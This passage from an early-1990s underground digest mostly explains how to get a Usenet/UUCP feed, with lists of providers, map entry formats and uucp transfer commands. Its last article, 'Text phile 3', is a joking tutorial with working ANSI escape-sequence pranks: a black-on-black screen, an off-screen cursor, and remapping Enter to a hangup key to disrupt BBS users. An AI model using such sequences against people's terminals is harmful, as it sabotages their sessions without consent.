  856. found at SIMTEL, UUNET, or also can be gotten from the source: darkside.com
  857. BBS at 1-408-245-SPAM (e-mail: dell@vox.darkside.com), or from The Underground
  858. BBS. The package does not need to be run as a bbs, but can also be run as a
  859. personal system, and it is shareware. If you want freeware, then you might be
  860. interested in UUPC which can also be gotten from SIMTEL, UUNET, or from my
  861. bbs. Source code is available.
  862.  
  863.     Once you have software, read and re-read the docs. Get a friend to connect
  864. with you and learn how to use your software before you bother a sysadmin with
  865. connecting to Usenet proper.
  866.  
  867. CONNECTING TO USENET
  868.  
  869.     And now the hard part: you need to find someone to feed you. Mail feeds
  870. are usually not too difficult, but newsfeeds are harder to come by as they
  871. take more resources from the host machine than mail feeds due to the much
  872. larger volume of information. Possible sources of feeds include:
  873.  
  874.     - Systems on the previously mentioned *nixpub listing.
  875.     - Local colleges or universities.
  876.     - Systems found scanning the uucp maps.
  877.  
  878.         These can be gotten using anonymous uucp from UUNET, or also from
  879.         the mail server at MIT. You can request an index of the maps by
  880.         sending email to 'mail-server@pit-manager.mit.edu' with this message:
  881.  
  882.             path <your-site@address>
  883.             send usenet/comp.mail.maps/index
  884.             quit
  885.  
  886.         You can get help for this mail server by replacing the 'send' line
  887.         with just 'help'. You can see how being on the net already helps you
  888.         to get your machine on the net. The uucp maps are also an excellent
  889.         hackers tool as they list the sites in your area, points of contact,
  890.         and how they connect up to each other (at least for uucp connections).
  891.  
  892.         I believe older copies of the uucp maps can be found in the TELECOM
  893.         or UNIX forums on Compuserve.
  894.  
  895.     - Pay services.
  896.  
  897.     Here are some of the providers:
  898.  
  899.       o Anterior Technology
  900.         P.O. Box 1206
  901.         Menlo Park, CA  94026-1206
  902.         Voice: (415) 328-5615
  903.         info@fernwood.mpk.ca.us
  904.         (UUCP, connectivity, name service, MX forwarding, news feeds)
  905.  
  906.       o CERFnet
  907.         P.O. Box 85608
  908.         San Diego, CA  92186-9784
  909.         Voice: (800) 876-CERF
  910.         help@cerf.net
  911.         (connectivity, name service, MX forwarding, news feeds)
  912.  
  913.       o Colorado SuperNet, Inc.
  914.         Attn: David C. Menges
  915.         Colorado School of Mines
  916.         1500 Illinois
  917.         Golden, CO  80401
  918.         Voice: 303-273-3471
  919.         dcm@csn.org
  920.         (UUCP, news feeds)
  921.  
  922.       o MSEN, Inc.
  923.         628 Brooks Street
  924.         Ann Arbor, MI 48103
  925.         Voice: (313) 741-1120
  926.         info@msen.com
  927.         (UUCP, connectivity, name service, MX forwarding, news feeds)
  928.  
  929.       o MV Communications, Inc.
  930.         P.O. Box 4963
  931.         Manchester, NH  03108-4963
  932.         Voice: (603) 429-2223
  933.         Data: (603) 429-1735 (log in as "info" or "rates")
  934.         info@mv.mv.com
  935.         (UUCP, name service, MX forwarding, news feeds)
  936.  
  937.       o NEARnet
  938.         Attn: John Curran
  939.         BBN Systems and Technologies
  940.         MS 6/3B
  941.         10 Moulton Street
  942.         Cambridge, MA  02138
  943.         Voice: (617) 873-8730
  944.         jcurran@nic.near.net
  945.         (connectivity, name service, MX forwarding, news feeds (for
  946.          NEARnet sites))
  947.  
  948.       o Netcom - Online Communication Services
  949.         P.O. Box 20774
  950.         San Jose, CA 95160
  951.         Voice: (408) 554-8649
  952.         bobr@netcom.com
  953.         (UUCP, connectivity, name service, MX forwarding, news feeds)
  954.  
  955.       o SURAnet
  956.         8400 Baltimore Blvd.
  957.         College Park, MD  20742
  958.         Voice: (301) 982-3214
  959.         news-admin@sura.net
  960.         (connectivity, name service (for SURAnet sites), news feeds (for
  961.          SURAnet sites))
  962.  
  963.       o UUNET Canada, Inc.
  964.         1 Yonge St., Suite 1801
  965.         Toronto, Ontario
  966.         Canada M5E 1W7
  967.         Voice: (416) 368-6621
  968.         info@uunet.ca or uunet-ca@uunet.uu.net
  969.         (UUCP, connectivity, name service, MX forwarding, news feeds)
  970.  
  971.       o UUNET Technologies Inc.
  972.         3110 Fairview Park Drive, Suite 570
  973.         Falls Church, VA 22042
  974.         Voice: (703) 876-5050
  975.         info@uunet.uu.net
  976.         AlterNet (network connectivity) info: alternet-info@uunet.uu.net
  977.         (UUCP, connectivity, name service, MX forwarding, news feeds)
  978.  
  979.      o  UUNORTH, Inc.
  980.         Box 445, Station E
  981.         Toronto, Ontario
  982.         Canada M6H 4E3
  983.         Voice: (416) 537-4930 or (416) 225-UNIX
  984.  
  985.      o  Performance Systems International, Inc.
  986.         11800 Sunrise Valley Drive, Suite 1100
  987.         Reston, VA  22091
  988.         Voice: (703) 620-6651 or (800) 827-7482
  989.         Computerized info: all-info@psi.com
  990.         Human-based info: info@psi.com
  991.         (UUCP, connectivity, name service, MX forwarding, news feeds)
  992.  
  993. SUBMIT A UUCP MAP ENTRY
  994.  
  995.    All machines connecting to the UUCP network should submit
  996.    a UUCP map to the map coordinator, <uucpmap@rutgers.edu>. The
  997.    purpose of these maps is to facilitate finding the fastest
  998.    path between any two systems, and also to prevent duplicate
  999.    names that would cause mail to be lost.
  1000.  
  1001.    Maps are posted to comp.mail.maps newsgroup on a fairly
  1002.    regular basis. In addition to the maps, there is a README file
  1003.    that documents these details in much more detail -- the
  1004.    information here is not enough to construct a full map entry.
  1005.  
  1006.    You should obtain this README file from one of your neighbors;
  1007.    it is also available on the waffle BBS system +1 408 245 SPAM (as
  1008.    the file /public/waffle/uucp-map.txt), or it can be found in the
  1009.    /public/text/misc directory on The Underground BBS.
  1010.  
  1011.    The basic format of the maps consists of a number of lines
  1012.    with a # and a letter, followed by a tab and then information
  1013.    corresponding to that letter:
  1014.  
  1015.     #N    UUCP name of site
  1016.     #S    manufacturer machine model; operating system & version
  1017.     #O    organization name
  1018.     #C    contact person's name
  1019.     #E    contact person's electronic mail address
  1020.     #T    contact person's telephone number
  1021.     #P    organization's address
  1022.     #L    latitude / longitude
  1023.     #R    remarks
  1024.     #U    netnews neighbors
  1025.     #W    who last edited the entry ; date edited
  1026.     #
  1027.     sitename      .domain
  1028.     sitename      remote1(FREQUENCY), remote2(FREQUENCY),
  1029.           remote3(FREQUENCY)
  1030.  
  1031. ARCHIVE SERVERS
  1032.  
  1033.    There are many archive servers. These systems provide files via e-mail.
  1034. For example the pit-manager mail server at MIT mentioned above is one. You
  1035. can get back issues of the Computer Underground Digest from the University
  1036. of Chicago archive server. To use the U. of Chicago email server, send mail
  1037. with the subject "help" (without the quotes) to:
  1038.  
  1039.     archive-server@chsun1.spc.uchicago.edu.
  1040.  
  1041.     There are many more archive servers. You can also get binaries using a
  1042. pair of utilities called uuencode, and uudecode. These utilities convert
  1043. binary code to ascii text code suitable for transmission via e-mail (or to be
  1044. posted on when of the many .binaries newsgroups on Usenet.
  1045.  
  1046. MAILING LISTS
  1047.  
  1048.     Once you have an e-mail account you can join mailing lists. These can be
  1049. the electronic equivalent of the newsletters, or they can echo mail to
  1050. multiple destinations. For example you mail a certain mail list, and copies
  1051. will be echoed to all who are on the list. For example you can sign up for
  1052. the Phrack electronic P/H newsletter by:
  1053.  
  1054. 1.  Send a piece of electronic mail to "LISTSERV@STORMKING.COM".  The mail
  1055.     must be sent from the account where you wish Phrack to be delivered.
  1056.  
  1057. 2.  Leave the "Subject:" field of that letter empty.
  1058.  
  1059. 3.  The first line of your mail message should read:
  1060.     SUBSCRIBE PHRACK <your name here>
  1061.  
  1062. 4.  DO NOT leave your address in the name field!
  1063.     (This field is for PHRACK STAFF use only, so please use a full name)
  1064.  
  1065. Sign up for the NIA newsletter by sending mail to: nia@nuchat.sccsi.com.
  1066.  
  1067.     Incidentally, you do not have to be part of the Usenet, ot the Internet
  1068. (the TCP/IP network), to participate. See the excellent article in NIA73
  1069. about e-mail gateways between networks "Internet to Anywhere" by Industrial
  1070. Phreak.
  1071.  
  1072.     I should also mention that with a mail account, you can still post to
  1073. a Usenet newsgroup. Send mail to <newsgroup>@ucbvax.berkeley.edu. For
  1074. newsgroup you want to change any periods to dashes. For example,
  1075. alt-bbs@ucbvax.berkley.edu to post to the alt.bbs newsgroup. If you desire
  1076. a response to your posting be sure to put in a line like: Please e-mail all
  1077. replies.
  1078.  
  1079. USING UUCP TO TRANSFER FILES
  1080.  
  1081.    The uucp program allows files to be transmitted to and from
  1082.    any neighboring system, via the command line.
  1083.  
  1084.    To "push" a file from the local machine to the remote machine:
  1085.  
  1086.     uucp filename.here unix!~/filename.there
  1087.  
  1088.    To "pull" a file into a machine off the remote machine:
  1089.  
  1090.     uucp unix!~/filename.there filename.here
  1091.  
  1092.     unix is used here as the name of the remote machine.
  1093.  
  1094.     For example you can connect to the uunet machine directly via
  1095. a 1-900 number, and get access to a wealth of source code and
  1096. information about the network. Call 1-900-468-7727 and use the login
  1097. "uucp" with no password. Callers are charged 50 cents per minute.
  1098. The charges appear on your phone bill.
  1099.  
  1100.      The  file  uunet!~/help  contains  instructions.   The  file
  1101. uunet!~/ls-lR.Z  contains  a complete list of the files available
  1102. and is updated daily.  Files ending in Z need to be uncompressed
  1103. before being used.   The file uunet!~/compress.tar is a tar
  1104. archive containing the C sources for the uncompress program.
  1105.  
  1106. 1. How to reach UUNET's 900 number via uucp
  1107.  
  1108.    Here are some sample a L.sys or Systems file lines suitable for
  1109.    UUNET's 900 number:
  1110.  
  1111.    # Simple line.
  1112.    uunet Any ACU 19200 1-900-468-7727 in:--in:--in: uucp
  1113.    #
  1114.    # Set up for a Telebit.
  1115.    uunet Any cua0 19200 cua0 "" ATX0S50=255S111=30DT19004687727\r CONNECT ""
  1116.        login: uucp
  1117.  
  1118.    Modify as appropriate for your site, of course, to deal with your
  1119.    local telephone system and uucp version.
  1120.  
  1121.    All modems on the 900 lines are Telebit T2500s.  Note that these
  1122.    modems first answer with V.32, then at 2400, 1200, and last with PEP
  1123.    tones.  This "900" number charges $.50US per minute to the caller.
  1124.  
  1125. 2. Where the files are
  1126.  
  1127.    This file of instructions exists as the file uunet!~/info/archive-help
  1128.    uunet!~/ls-lR.Z contains a list of all files available.  This is the
  1129.    compressed output of an `ls -lR' command.  This file is updated each
  1130.    night.  (Note this file is currently about 520 Kbytes *compressed*).
  1131.    Information on other indexes can be found in uunet!~/index/README.
  1132.    The file uunet!~/info/layout details the basic organization of the
  1133.    archive.
  1134.  
  1135. 3. File formats
  1136.  
  1137.    Files with .Z endings are compressed.  The uncompress program is
  1138.    available in uunet!~/compress.tar if you don't have it.
  1139.  
  1140.    Some very large files have been split into several files for you.
  1141.    This are usually evidenced by sequenced endings after a .Z ending.
  1142.     eg: emacs/18.57.Z.01 .. emacs/18.57.Z.39
  1143.    After you obtain all of the parts you need only concatenate them
  1144.    in the proper order.
  1145.     eg: cat 18.57.Z.* > emacs-18.57.Z
  1146.  
  1147. UUCP File Transfer Tips
  1148.  
  1149.    You must write files you transfer to a directory which the user
  1150.    "uucp" has write access.  That user, not you, will actually do the
  1151.    transfer.  /usr/spool/uucppublic is the common place used.
  1152.  
  1153.    You may see different pathnames for files in an archive which
  1154.    equate to the same thing.  For example an archive that is /usr/spool/ftp
  1155.    (aka ~ftp), might also accessible as /usr/spool/uucppublic (aka
  1156.    ~uucp, or just ~ for UUCP).
  1157.  
  1158.    Be sure you use absolute pathnames when specifying remote filename.
  1159.    If you don't, your working directory will be prepended to the
  1160.    pathname in the command.  uunet!file and uunet!~/file are different.
  1161.    uunet!~/ is the best reference to the base of the archive via uucp.
  1162.  
  1163.    Permission denied messages normally indicate a file name or
  1164.    file access problem.  Be sure to have the latest copy of the file
  1165.    list.
  1166.  
  1167.    Beware when using shell meta-characters in transfers.  You need to
  1168.    escape them in most circumstances (eg: the ! in csh).  Also note
  1169.    that there are a number of UUCP implementations which do not handle
  1170.    multi-file transfers correctly.  If you pass a * to the remote
  1171.    system you may get 'access denied' messages.  These indicate a UUCP
  1172.    problem, not a file problem.
  1173.  
  1174. OTHER RESOURCES
  1175.  
  1176.   In addition to the resources already mentioned, there are several
  1177. books which discuss USENET and/or UUCP maintenance.  They include:
  1178.  
  1179.     Using UUCP and Usenet; Grace Todino; ISBN 0-937175-10-2
  1180.         Date: 1990. Pages: 210. Cost: $24.95
  1181.  
  1182.     Managing UUCP and Usenet; Tim O'Reilly and Grace Todino;
  1183.         ISBN 0-937175-48-X. Date: 1990. Pages: 289. Cost: $24.95
  1184.  
  1185.     Both are "Nutshell" handbooks. O'Rielly and Associates: 981 Chestnut
  1186. Street Newton MA 02164 USA, 1-800-338-NUTS. E-mail: ...!uunet!ora!nuts
  1187.  
  1188.         Unix Communications; Bart Anderson, Barry Costales, and Harry
  1189.         Henderson, Harry; The Waite Group. ISBN 0-672-22773-8. Date: 1991.
  1190.         Pages: 736. Cost: $29.95.
  1191.  
  1192.     Covers everything the end user needs to know about email, USENET and UUCP.
  1193.  
  1194. ------------------------------------------------------------------------------
  1195. ------------------
  1196. | Article 8 of 8 |
  1197. ------------------
  1198.  
  1199. To: hackers@tsf.UUCP
  1200. Subject: Text phile 3.
  1201. From: bbc@tsf.UUCP (The BBC)
  1202. Organization: The CyberUnderground
  1203.  
  1204.     Welcome, Kiddies... To another jam packed fun day at... The BBC's
  1205. crash house... Todays secret word is 'ANSI'... Yes after this lesson
  1206. when ever a sysop/user hears the word 'ANSI', They will scream real
  1207. loud!!!
  1208.  
  1209.     First lets ask our friend Crashy a question... Crashy, do you
  1210. use a term package that supports... 'ANSI' [AAAAAAAAHHHHHHH] or have
  1211. the driver 'ANSI.sys' [AAAAHHHHH] loaded in your config.sys???
  1212. 'Well... Yes, I guess'... Good, See kiddies every one uses it but
  1213. few understand it... An that is how we will play with the users
  1214. of a bbs's mind as well as the sysops [usually not much of one here]...
  1215.  
  1216.     First a bit of an explanation... ANSI [AAAAHHHHHHH] is a method
  1217. of controlling IO on remote systems... It uses escape sequences to
  1218. do every thing from moving the cursor around and changing color of
  1219. the text to redefining the keyboard keys... A very useful tool for
  1220. helping computer users and making nice displays.. An a cheep shot
  1221. as far as hacking games go... But that never stoped us before... For
  1222. what if some devious minds where to put them to use??? An we are just
  1223. the ones to do it... Also for those who don't know, [ESC] stands for
  1224. the escape char. [0x1b] or to type it in remote hold down the ALT key
  1225. while typing 27 on the numeric key pad then release the ALT key...
  1226.  
  1227.     Lets start with a classic... We all know to change the text color
  1228. you use the sequence 'ESC[<color>;<color>;...<color>m' and it will
  1229. change the color for all following text till it is used again... Well
  1230. what if one uses the command 'ESC[0;8m'... This would cause the ANSI
  1231. [AAAAHHHHH] driver to reset the color to default then set the screen
  1232. to black text on a black background... What a glorious sight (or lack
  1233. of there) when the computer just seems to stop... No text no
  1234. nothing... An if they don't reset it, well.... All the boards they
  1235. call afterwards will do the same...
  1236.  
  1237.     Or how about this one... 'ESC[=0h;=7l'... All it does is set the
  1238. screen to 40 column mode and turns line wrapping off... So there eyes
  1239. get a rest... only half the calories of a regular screen and in
  1240. larger portions...
  1241.  
  1242.     Then there is the story of the farmer's 'ESC[26;0H'... Moving the
  1243. cursor off the screen and making them wait for the next prompt (if
  1244. this command is at the end of a message) that seams to never come...
  1245. But you should not tell this joke in polite company...
  1246.  
  1247.     An of course we saved the best for last... The ol' Two Face key
  1248. change... Just use the command 'ESC[<From key>;<To key>p' and wha-la
  1249. instant chaos... For example 'ESC[13;0;35p', next time the [ENTER]
  1250. key is hit it changes into a ALT-H (The hangup command for most
  1251. term packages... An we would hope you would not use this to just
  1252. redefine the whole keyboard so that what they type is not what
  1253. they get!!! That would be.... bad... An you are not a bunch of
  1254. bad boys and girls are you... We thought so...
  1255.  
  1256.     So boys and girls... Its time to go... and remember...
  1257. The night belongs to the hackers... The early hacker gets to DOS...
  1258. A virus in the system is worth 2 trojans in the bush... Ect.. Ect..
  1259. Ect..
  1260.  
  1261. 'Another fine mess' from your friends at...
  1262. The BBC
  1263.  
  1264. ----------------------------------------------------------------------
  1265.  ...uunet!rayssd!galaxia!underg!tsf!bbc (The BBC)
  1266.              -=[ "Anarchy is never HAVING to say you're sorry." ]=-
  1267.  
  1268. ------------------------------------------------------------------------------
  1269.  That's all folks...keep that e-mail coming!
  1270. ------------------------------------------------------------------------------
  1271.  
  1272. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1273.                             -= Max Cray =-
  1274.  Internet:   underg!max@uunet.uu.net                         Support
  1275.  UUCP:       ...!uunet!idsvax!underg!max                     Free
  1276.  Data:       The Underground Computing Foundation BBS        Software
  1277.              401-847-2603 -=- 9600 baud (v.32)               (w/src)
  1278.  CI$:        76334,2203
  1279.  
  1280.  
  1281.  
  1282.